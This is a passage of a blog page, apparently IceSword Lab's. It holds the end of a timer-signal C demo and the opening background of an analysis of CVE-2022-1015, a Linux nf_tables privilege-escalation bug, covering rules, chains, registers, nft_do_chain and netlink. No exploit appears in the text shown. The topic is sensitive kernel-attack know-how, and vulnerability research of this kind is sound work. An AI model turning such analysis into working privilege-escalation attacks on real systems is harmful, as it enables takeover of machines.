class="keyword">long</span> rax = ucontext->uc_mcontext.gregs[REG_RAX];</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Timer fired, PC = %p, rax: %ld\n"</span>, pc, rax);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span> </span>{</span><br><span class="line"> pin_to(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Set up the signal handler for SIGALRM</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">sigaction</span> <span class="title">sa</span>;</span></span><br><span class="line"> <span class="built_in">memset</span>(&sa, <span class="number">0</span>, <span class="keyword">sizeof</span>(sa));</span><br><span class="line"> sa.sa_flags = SA_SIGINFO;</span><br><span class="line"> sa.sa_sigaction = timer_handler;</span><br><span class="line"> sigaction(SIGALRM, &sa, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Start the timer</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">itimerspec</span> <span class="title">its</span>;</span></span><br><span class="line"> its.it_interval.tv_sec = <span class="number">0</span>;</span><br><span class="line"> its.it_interval.tv_nsec = <span class="number">10000000</span>; <span class="comment">// 100Hz</span></span><br><span class="line"> its.it_value = its.it_interval;</span><br><span class="line"> <span class="keyword">timer_t</span> timerid;</span><br><span class="line"> timer_create(CLOCK_MONOTONIC, <span class="literal">NULL</span>, &timerid);</span><br><span class="line"> timer_settime(timerid, <span class="number">0</span>, &its, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Run a loop to generate some activity</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">int</span> i;</span><br><span class="line"> <span class="keyword">while</span> (<span class="number">1</span>) {</span><br><span class="line"> <span class="function">__asm__ <span class="title">volatile</span> <span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $1, %%rax\n\t"</span> <span class="comment">// Move 1 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $2, %%rax\n\t"</span> <span class="comment">// Move 2 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $3, %%rax\n\t"</span> <span class="comment">// Move 3 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $4, %%rax\n\t"</span> <span class="comment">// Move 4 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $5, %%rax\n\t"</span> <span class="comment">// Move 5 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $6, %%rax\n\t"</span> <span class="comment">// Move 6 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $7, %%rax\n\t"</span> <span class="comment">// Move 7 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $8, %%rax\n\t"</span> <span class="comment">// Move 8 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $9, %%rax\n\t"</span> <span class="comment">// Move 9 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $10, %%rax\n\t"</span> <span class="comment">// Move 10 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"></span></span></span><br><span class="line"><span class="function"><span class="params"> : <span class="comment">// No output operand</span></span></span></span><br><span class="line"><span class="function"><span class="params"> : <span class="comment">// No input operand</span></span></span></span><br><span class="line"><span class="function"><span class="params"> : <span class="string">"%rax"</span> <span class="comment">// Clobbered register</span></span></span></span><br><span class="line"><span class="function"><span class="params"> )</span></span>;</span><br><span class="line"> <span class="comment">//i = -1; /* 内存写操作 */</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
</div>
<footer class="article-footer">
<a data-url="http://yoursite.com/2023/03/10/race_windown/" data-id="cmd5slr2m000o0lo1fiscdwzm" class="article-share-link">Share</a>
</footer>
</div>
</article>
<article id="post-2023/02/06/cve-2022-1015" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2023/02/06/cve-2022-1015/" class="article-date">
<time datetime="2023-02-06T14:00:00.000Z" itemprop="datePublished">2023-02-06</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2023/02/06/cve-2022-1015/">CVE-2022-1015 nf_tables 提权漏洞分析</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>author: 莫兴远 of <a href="https://www.iceswordlab.com/about/" target="_blank" rel="noopener">IceSword Lab</a></p>
<h1 id="一、简介"><a href="#一、简介" class="headerlink" title="一、简介"></a>一、简介</h1><p>CVE-2022-1015 是 Linux 内核 nf_tables 模块的一个漏洞,其成因为没有合理限制整数范围导致栈越界读写。</p>
<p>受该漏洞影响的内核版本范围为 5.12 ~ 5.16 。</p>
<p>该漏洞为此 <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e1acfa387b9ff82cfc7db8cc3b6959221a95851" target="_blank" rel="noopener">commit</a> 所修复。</p>
<h1 id="二、漏洞相关知识"><a href="#二、漏洞相关知识" class="headerlink" title="二、漏洞相关知识"></a>二、漏洞相关知识</h1><p>Netfilter 是 Linux 内核一个非常庞大的子系统,它在内核的网络栈中置入多个钩子,并允许其他模块在这些钩子处注册回调函数,当内核执行到钩子处时,所有被注册的回调函数都会被执行。</p>
<p>nf_tables 则是隶属于 Netfilter 子系统的一个模块,它在 Netfitler 的某些钩子处注册了回调函数,以提供网络数据包过滤功能,通常被用于实现防火墙等功能。本文所分析的漏洞就位于 nf_tables 模块中。</p>
<p>在用户态与 nf_tables 交互则是通过 netlink。netlink 是常见的用户态与内核态进行交互的手段,它通过向 AF_NETLINK 类型的 socket 发送数据向内核传递信息,类似地,还可通过从该类型 socket 接收数据以获取内核传递回来的信息。</p>
<h2 id="2-1-nf-tables实现"><a href="#2-1-nf-tables实现" class="headerlink" title="2.1 nf_tables实现"></a>2.1 nf_tables实现</h2><p>nf_tables 允许用户向其注册处理网络数据包的 rule,以决定针对不同类型的数据包该采取哪种行动。多条 rule 被组织在一条 chain 中,多条 chain 则被组织在一个 table 中。不同类型的 chain 会与不同的 Netfilter hook 绑定在一起。当网络数据包到达后,经过内核不同的 hook 时,所有绑定在该 hook 处的 chain 都会被执行,以完成对数据包的处理。在这里,chain 的执行是指其中所有的 rule 被依次执行,rule 的执行则又是指数据包会根据其中拟定的规则确定被采取什么行动,是丢弃、拒绝还是接受。</p>
<p>向 nf_tables 注册 rule 的方式是通过 netlink。由于通过 netlink 向内核发送的数据包过于底层,用户使用起来不方便,开发者提供了用户态工具 nft,方便用户通过更高级的语法拟定规则。</p>
<h3 id="2-1-1-rule"><a href="#2-1-1-rule" class="headerlink" title="2.1.1 rule"></a>2.1.1 rule</h3><p>rule 包含如何处理数据包的逻辑,比如检查数据包的协议、源地址、目标地址、端口等,以分别采取不同的行动。每条 rule 都和一个 verdict 绑定,即每条 rule 都有一个默认的裁定,决定对数据包采取何种行为,是丢弃、拒绝还是接受。举个例子:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">udp dport 50001 drop</span><br></pre></td></tr></table></figure>
<p>drop 就是该 rule 的 verdict,表示所有目标端口为 50001 的 udp 数据包都会被丢弃。</p>
<h3 id="2-1-2-chain"><a href="#2-1-2-chain" class="headerlink" title="2.1.2 chain"></a>2.1.2 chain</h3><p>chain 是将 rule 组织起来的结构,一条 chain 可包含多条 rule。chain 分为 base chain 和 non-base chain,base chain 是直接绑定到 Netfilter hook 上面的,执行流只会从 base chain 开始。chain 中的 rule 一般都是依次执行完,有时候某条 rule 的 verdict 会让执行流跳转到其他的 chain,从而越过该 chain 中剩下的 rule,但只能跳转到 non-base chain。跳转分两种,一种是跳转后到某条 chain 后就不可以返回了,另一种则是跳转后还可以返回继续执行原来的 chain 剩下的 rule。</p>
<h3 id="2-1-3-table"><a href="#2-1-3-table" class="headerlink" title="2.1.3 table"></a>2.1.3 table</h3><p>table 是 nf_tables 最顶层的结构,它包含多条 chain。chain 只能跳转到同一 table 中的其他 chain。</p>
<p>每个 table 都会从属于某个族,族决定了该 table 会处理哪些种类的数据包。族包括 ip、 ip6、 inet、 arp、 bridge 和 netdev。</p>
<p>属于 ip 族的 table 只负责处理 IPv4 数据包,属于 ip6 族的 table 只负责处理 IPv6 数据包,属于 inet 族的 table 则既可处理 IPv4 又可处理 IPv6 数据包。</p>
<h3 id="2-1-4-expression"><a href="#2-1-4-expression" class="headerlink" title="2.1.4 expression"></a>2.1.4 expression</h3><p>事实上,rule 在层次结构上还可以细分为多个 expression,expression 相当于一条条应用在数据包上的具体指令。用户态工具一般不会涉及到 expression 这个抽象表示,只有内核代码会涉及到。</p>
<p>对于 udp dport 50001 drop 这个规则,需要先通过一个 expression 检查协议是不是 udp,再通过一个 expression 检查端口是不是 50001,如果前面的 expression 都通过了,最后再通过一个 expression 将 verdict 设置为 drop,以将数据包丢弃。</p>
<p>每种 expression 会和一个 struct nft_expr_ops 实例绑定,比如 immediate 这个 expression:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">nft_expr_ops</span> <span class="title">nft_imm_ops</span> = {</span></span><br><span class="line"> .type = &nft_imm_type, <span class="comment">// expression 类型</span></span><br><span class="line"> .<span class="built_in">size</span> = NFT_EXPR_SIZE(<span class="keyword">sizeof</span>(struct nft_immediate_expr)),</span><br><span class="line"> .eval = nft_immediate_eval, <span class="comment">// 当 expression 被执行时调用</span></span><br><span class="line"> .init = nft_immediate_init, <span class="comment">// 当 expression 被初始化时调用</span></span><br><span class="line"> .activate = nft_immediate_activate,</span><br><span class="line"> .deactivate = nft_immediate_deactivate,</span><br><span class="line"> .destroy = nft_immediate_destroy,</span><br><span class="line"> .dump = nft_immediate_dump,</span><br><span class="line"> .validate = nft_immediate_validate,</span><br><span class="line"> .reduce = nft_immediate_reduce,</span><br><span class="line"> .offload = nft_immediate_offload,</span><br><span class="line"> .offload_action = nft_immediate_offload_action,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>每次当一条 rule 被添加进来,其所有 expression 的 init 函数都会被调用。</p>
<p>当某个 expression 被执行时,其 eval 函数会被调用。</p>
<h3 id="2-1-5-register"><a href="#2-1-5-register" class="headerlink" title="2.1.5 register"></a>2.1.5 register</h3><p>expression 在操作数据包时,需要内存来记录一些数据,这部分内存就是 register。在内核的实现中,所有 register 都在栈上,且在内存地址上是连续的。</p>
<p>expression 可以读取或修改 register 的数据,单次访问的对象既可以是单个 register,也可以是连续的多个 register,因此 register 可以看做是一块连续的缓冲区。</p>
<p>register 可通过 index 索引,以下是内核中定义的 register 的 index:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> nft_registers {</span><br><span class="line"> NFT_REG_VERDICT,</span><br><span class="line"> NFT_REG_1,</span><br><span class="line"> NFT_REG_2,</span><br><span class="line"> NFT_REG_3,</span><br><span class="line"> NFT_REG_4,</span><br><span class="line"> __NFT_REG_MAX,</span><br><span class="line"></span><br><span class="line"> NFT_REG32_00 = <span class="number">8</span>,</span><br><span class="line"> NFT_REG32_01,</span><br><span class="line"> NFT_REG32_02,</span><br><span class="line"> ...</span><br><span class="line"> NFT_REG32_13,</span><br><span class="line"> NFT_REG32_14,</span><br><span class="line"> NFT_REG32_15,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>register 有两种索引方式。NFT_REG_1 到 NFT_REG_4 是一种,共 4 个 register,每个 16 字节;NFT_REG32_00 到 NFT_REG32_15 是另一种,共 16 个 reigster,每个 4 字节。在两种索引方式中,NFT_REG_VERDICT 都指向 verdict register,大小为 16 字节。两种索引方式针对的都是同一片内存,因此内存总数都是 16 + 4 * 16 = 16 + 16 * 4 = 80 字节。</p>
<p><img src="images/01.png" alt></p>
<p>verdict register 在内存上位于最前,每条 rule 执行完后都会设置好 verdict register,以决定下一步该怎么执行。verdict register 可以设置成以下值:</p>
<table>
<thead>
<tr>
<th>verdict</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>NFT_CONTINUE</td>
<td>默认 verdict,继续执行下一个 expression。</td>
</tr>
<tr>
<td>NFT_BREAK</td>
<td>跳过该 rule 剩下的 expression,继续执行下一条 rule。</td>
</tr>
<tr>
<td>NF_DROP</td>
<td>丢弃数据包,停止执行。</td>
</tr>
<tr>
<td>NF_ACCEPT</td>
<td>接受数据包,停止执行。</td>
</tr>
<tr>
<td>NFT_GOTO</td>
<td>跳转到另一条 chain,且不再返回。</td>
</tr>
<tr>
<td>NFT_JUMP</td>
<td>跳转到另一条 chain,执行完该 chain 后,若 verdict 为 NFT_CONTINUE,则返回原本的 chain 继续执行。</td>
</tr>
</tbody></table>
<h3 id="2-1-6-nft-do-chain"><a href="#2-1-6-nft-do-chain" class="headerlink" title="2.1.6 nft_do_chain"></a>2.1.6 nft_do_chain</h3><p>nft_do_chain 实现了依次执行所有 base chain 中所有 rule 的所有 expression 的逻辑,以下是添加了许多说明性注释的该函数的代码:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span></span><br><span class="line">nft_do_chain(struct nft_pktinfo *pkt, <span class="keyword">void</span> *priv)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">nft_chain</span> *<span class="title">chain</span> = <span class="title">priv</span>, *<span class="title">basechain</span> = <span class="title">chain</span>;</span></span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">nft_rule_dp</span> *<span class="title">rule</span>, *<span class="title">last_rule</span>;</span></span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">net</span> *<span class="title">net</span> = <span class="title">nft_net</span>(<span class="title">pkt</span>);</span></span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">nft_expr</span> *<span class="title">expr</span>, *<span class="title">last</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">nft_regs</span> <span class="title">regs</span>;</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> stackptr = <span class="number">0</span>;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">nft_jumpstack</span> <span class="title">jumpstack</span>[<span class="title">NFT_JUMP_STACK_SIZE</span>];</span></span><br><span class="line"> <span class="keyword">bool</span> genbit = READ_ONCE(net->nft.gencursor);</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">nft_rule_blob</span> *<span class="title">blob</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">nft_traceinfo</span> <span class="title">info</span>;</span></span><br><span class="line"></span><br><span class="line"> info.trace = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">if</span> (static_branch_unlikely(&nft_trace_enabled))</span><br><span class="line"> nft_trace_init(&info, pkt, &regs.verdict, basechain);</span><br><span class="line">do_chain:</span><br><span class="line"> <span class="keyword">if</span> (genbit)</span><br><span class="line"> blob = rcu_dereference(chain->blob_gen_1);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> blob = rcu_dereference(chain->blob_gen_0);</span><br><span class="line"></span><br><span class="line"> rule = (struct nft_rule_dp *)blob->data;</span><br><span class="line"> <span class="comment">/* 获取最后一条 rule 的位置,以确定循环的停止条件 */</span></span><br><span class="line"> last_rule = (<span class="keyword">void</span> *)blob->data + blob-><span class="built_in">size</span>;</span><br><span class="line">next_rule: <span class="comment">// 执行到一条新的 chain,或返回到原来的 chain,都从这里开始</span></span><br><span class="line"> regs.verdict.code = NFT_CONTINUE; <span class="comment">// the default verdict code = NFT_CONTINUE</span></span><br><span class="line"> <span class="keyword">for</span> (; rule < last_rule; rule = nft_rule_next(rule)) { <span class="comment">// iterate through the rules</span></span><br><span class="line"> <span class="comment">/* iterate through the expressions */</span></span><br><span class="line"> nft_rule_dp_for_each_expr(expr, last, rule) {</span><br><span class="line"> <span class="comment">// execute the expression</span></span><br><span class="line"> <span class="keyword">if</span> (expr->ops == &nft_cmp_fast_ops)</span><br><span class="line"> nft_cmp_fast_eval(expr, &regs);</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (expr->ops == &nft_cmp16_fast_ops)</span><br><span class="line"> nft_cmp16_fast_eval(expr, &regs);</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (expr->ops == &nft_bitwise_fast_ops)</span><br><span class="line"> nft_bitwise_fast_eval(expr, &regs);</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (expr->ops != &nft_payload_fast_ops ||</span><br><span class="line"> !nft_payload_fast_eval(expr, &regs, pkt))</span><br><span class="line"> expr_call_ops_eval(expr, &regs, pkt);</span><br><span class="line"> <span class="comment">/* 如果 verdict 不是 NFT_CONTINUE, 停止执行该 rule 接下来的 expression */</span></span><br><span class="line"> <span class="keyword">if</span> (regs.verdict.code != NFT_CONTINUE) </span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 已执行完一条 rule,检查 verdict,</span></span><br><span class="line"> <span class="comment">// 如果不是 NFT_BREAK 或 NFT_CONTINUE,停止执行该 chain 剩下的 rule</span></span><br><span class="line"> <span class="keyword">switch</span> (regs.verdict.code) { </span><br><span class="line"> <span class="keyword">case</span> NFT_BREAK: </span><br><span class="line"> <span class="comment">// 若为 NFT_BREAK,则将 verdict 设置回 NFT_CONTINUE。</span></span><br><span class="line"> <span class="comment">// NFT_BREAK 和 NFT_CONTINUE 类似,都会执行下一条 rule,</span></span><br><span class="line"> <span class="comment">// 只是 NFT_BREAK 会跳过当前 rule 剩下的 expression。</span></span><br><span class="line"> regs.verdict.code = NFT_CONTINUE;</span><br><span class="line"> nft_trace_copy_nftrace(pkt, &info);</span><br><span class="line"> <span class="keyword">continue</span>;</span><br><span class="line"> <span class="keyword">case</span> NFT_CONTINUE:</span><br><span class="line"> <span class="comment">// 执行到这里代表执行完了当前 rule 的所有 expression,</span></span><br><span class="line"> <span class="comment">// 继续执行下一条 rule 即可。</span></span><br><span class="line"> nft_trace_packet(pkt, &info, chain, rule,</span><br><span class="line"> NFT_TRACETYPE_RULE);</span><br><span class="line"> <span class="keyword">continue</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// 若 verdict 不是 NFT_BREAK 或 NFT_CONTINUE,</span></span><br><span class="line"> <span class="comment">// 代表即将跳过该 chain 剩下的 rule,停止该 chain 的执行。</span></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> nft_trace_verdict(&info, chain, rule, &regs);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 执行到这里代表执行完了某条 chain,</span></span><br><span class="line"> <span class="comment">// 将根据 verdict 决定采取的行动</span></span><br><span class="line"> <span class="keyword">switch</span> (regs.verdict.code & NF_VERDICT_MASK) {</span><br><span class="line"> <span class="keyword">case</span> NF_ACCEPT:</span><br><span class="line"> <span class="keyword">case</span> NF_DROP:</span><br><span class="line"> <span class="keyword">case</span> NF_QUEUE:</span><br><span class="line"> <span class="keyword">case</span> NF_STOLEN:</span><br><span class="line"> <span class="comment">// 已经决定好对当前数据包的处理,退出函数即可。</span></span><br><span class="line"> <span class="keyword">return</span> regs.verdict.code;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 尚未决定好对数据包的处理,继续执行。</span></span><br><span class="line"> <span class="keyword">switch</span> (regs.verdict.code) {</span><br><span class="line"> <span class="keyword">case</span> NFT_JUMP: </span><br><span class="line"> <span class="comment">// 跳转到另一条 chain,将返回时需要的信息保存到 jumpstack 上</span></span><br><span class="line"> <span class="comment">// 返回后,执行的是当前 rule 的下一条 rule</span></span><br><span class="line"> <span class="keyword">if</span> (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))</span><br><span class="line"> <span class="keyword">return</span> NF_DROP;</span><br><span class="line"> jumpstack[stackptr].chain = chain;</span><br><span class="line"> jumpstack[stackptr].rule = nft_rule_next(rule);</span><br><span class="line"> jumpstack[stackptr].last_rule = last_rule;</span><br><span class="line"> stackptr++;</span><br><span class="line"> fallthrough;</span><br><span class="line"> <span class="keyword">case</span> NFT_GOTO:</span><br><span class="line"> <span class="comment">// 跳转到另一条 chain,不再返回</span></span><br><span class="line"> chain = regs.verdict.chain;</span><br><span class="line"> <span class="keyword">goto</span> do_chain;</span><br><span class="line"> <span class="keyword">case</span> NFT_CONTINUE: <span class="comment">// 执行下一条 chain</span></span><br><span class="line"> <span class="keyword">case</span> NFT_RETURN: <span class="comment">// 返回到上一次跳转前的 chain</span></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> WARN_ON_ONCE(<span class="number">1</span>);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> nft_base_chain(basechain)->policy;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>每执行完一个 expression、一条 rule 或 一条 chain 时,都会检查 verdict register。</p>
<p>执行完一个 expression 时,非 NFT_CONTINUE 的 verdict 会阻止该条 rule 剩下的 expression 的执行。</p>
<p>执行完一条 rule 时,非 NFT_BREAK 或 NFT_CONTINUE 的 verdict 会阻止该 chain 剩下的 rule 的执行。</p>
<p>执行完一条 chain 时,如果已经决定对数据包的处理,则停止执行。否则,根据 verdict 决定流程如何跳转。</p>
<h3 id="2-1-7-expression种类"><a href="#2-1-7-expression种类" class="headerlink" title="2.1.7 expression种类"></a>2.1.7 expression种类</h3><p>以下是常见的一些 expression 类型及其功能的简单描述:</p>
<table>
<thead>
<tr>
<th>类型</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>nft_immediate_expr</td>
<td>将一个常数保存进 register。</td>
</tr>
<tr>
<td>nft_payload</td>
<td>从数据包提取数据保存进 register。</td>
</tr>
<tr>
<td>nft_payload_set</td>
<td>将数据包的某部分数据设置成 register 中的数据。</td>
</tr>
<tr>
<td>nft_cmp_expr</td>
<td>比较 register 中的数据和某个常数,根据结果决定是否修改执行流。</td>
</tr>
<tr>
<td>nft_bitwise</td>
<td>对 register 中数据进行位操作,比如左移、亦或。</td>
</tr>
<tr>
<td>nft_range_expr</td>
<td>和 nft_cmp_expr 类似,但比较的是更大范围的数据,可跨越多个 register。</td>
</tr>
</tbody></table>
<h2 id="2-2-netlink"><a href="#2-2-netlink" class="headerlink" title="2.2 netlink"></a>2.2 netlink</h2><p>和 nf_table 进行交互需要通过 netlink。netlink 是 Linux 系统中和内核通信的常用方式,特别是在网络模块中使用率很高,它的设计是为了克服 ioctl 的一些缺点。</p>
<p>和 netlink 通信需要利用 AF_NETLINK 族的 socket。所有需要使用 netlink 的内核模块都要实现一个 protocal,nf_tables 则是实现了 NETLINK_NETFILTER 这一 protocal。因此,为了和 nf_tables 通信,只需要创建以下 socket:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER);</span><br></pre></td></tr></table></figure>
<p>当创建相应的 netlink socket 时,netlink 还会自动加载相应的模块,只要 modprobe 和 .ko 文件存放在合适的位置。</p>
<p>创建 socket 之后,就可通过 sendmsg 向 socket 发送消息,通过 recvmsg 从 socket 接收消息,从而实现和 nf_tables 通信。</p>
<p>sendmsg 的消息格式是:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">msghdr</span> {</span></span><br><span class="line"> <span class="keyword">void</span> *msg_name; <span class="comment">/* Optional address */</span></span><br><span class="line"> <span class="keyword">socklen_t</span> msg_namelen; <span class="comment">/* Size of address */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">iovec</span> *<span class="title">msg_iov</span>;</span> <span class="comment">/* Scatter/gather array */</span></span><br><span class="line"> <span class="keyword">size_t</span> msg_iovlen; <span class="comment">/* # elements in msg_iov */</span></span><br><span class="line"> <span class="keyword">void</span> *msg_control; <span class="comment">/* Ancillary data, see below */</span></span><br><span class="line"> <span class="keyword">size_t</span> msg_controllen; <span class="comment">/* Ancillary data buffer len */</span></span><br><span class="line"> <span class="keyword">int</span> msg_flags; <span class="comment">/* Flags (unused) */</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>消息的内容存放在 msg_iov 字段指向的 iovec 数组中。</p>
<p>发送 netlink 消息时,iovec 数组指向 struct nlmsghdr 结构:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">nlmsghdr</span> {</span></span><br><span class="line"> __u32 nlmsg_len; <span class="comment">/* Length of message including header */</span></span><br><span class="line"> __u16 nlmsg_type; <span class="comment">/* Message content */</span></span><br><span class="line"> __u16 nlmsg_flags; <span class="comment">/* Additional flags */</span></span><br><span class="line"> __u32 nlmsg_seq; <span class="comment">/* Sequence number */</span></span><br><span class="line"> __u32 nlmsg_pid; <span class="comment">/* Sending process port ID */</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>struct nlmsghdr 之后通常紧跟特定 protocol 定义的协议头部,不同 protocal 的协议头部差异很大。</p>
<p>协议头部之后是多个属性,属性的头部是以下结构:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">nlattr</span> {</span></span><br><span class="line"> __u16 nla_len;</span><br><span class="line"> __u16 nla_type;</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
